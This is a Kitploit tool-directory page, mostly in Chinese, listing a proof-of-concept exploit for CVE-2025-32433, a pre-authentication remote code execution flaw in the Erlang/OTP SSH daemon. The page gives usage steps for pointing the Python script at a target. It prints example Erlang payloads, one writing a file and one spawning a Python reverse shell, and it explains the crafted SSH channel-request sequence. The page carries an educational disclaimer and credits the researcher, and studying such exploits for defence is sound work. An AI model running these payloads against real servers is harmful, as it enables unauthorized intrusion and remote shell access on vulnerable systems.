Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32433 — Proof-of-concept exploit for CVE-2025-32433, 一个 Erlang/OTP SSH 守护进程中的预认证 RCE 漏洞。包含 Python 脚本,用于发送精心构造的 SSH 通道请求并执行任意命令。 | Kitploit
工具/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
漏洞分析漏洞利用渗透测试学习与教育远程访问工具Payload 开发
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

Proof-of-concept exploit for CVE-2025-32433, 一个 Erlang/OTP SSH 守护进程中的预认证 RCE 漏洞。包含 Python 脚本,用于发送精心构造的 SSH 通道请求并执行任意命令。

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32433 – Erlang/OTP SSH RCE 漏洞

📌 摘要

CVE-2025-32433 是一个影响 Erlang/OTP SSH 守护进程的远程代码执行(RCE)漏洞。 根本原因是对预认证SSH通道请求的处理不当,攻击者可以利用这些请求在认证之前执行任意命令。 附带的PoC演示了如何发送这种特制的SSH包;默认情况下,它会在目标上写入/lab.txt文件,但可以修改用于其他命令。

⚠️ 免责声明: 此仓库仅用于教育和研究目的。 未经明确许可,不得用于任何系统。

🛠️ 使用方法

  1. 编辑PoC脚本中的目标详细信息:
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. 运行漏洞利用程序:
python3 cve-2025-32433.py

默认情况下,它会创建包含pwned内容的/lab.txt文件。 修改build_channel_request中的payload以运行您自己的命令。

🧩 示例Payload

# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 PoC工作原理简述

  • 连接到SSH服务并交换banner信息。
  • 发送一个特制的SSH_MSG_KEXINIT包,使其看起来像正常握手。
  • 在认证之前发送SSH_MSG_CHANNEL_OPEN和带有execpayload的SSH_MSG_CHANNEL_REQUEST。
  • 如果目标存在漏洞,服务器会执行提供的Erlang命令。

🙏 致谢

发现和撰写者:Matt Keeley(Platform Security)。 感谢他发布PoC并分享详细信息。

博客链接:https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 参考

  • Matt Keeley的博客
  • Erlang/OTP安全公告
  • MITRE CVE记录
下载工具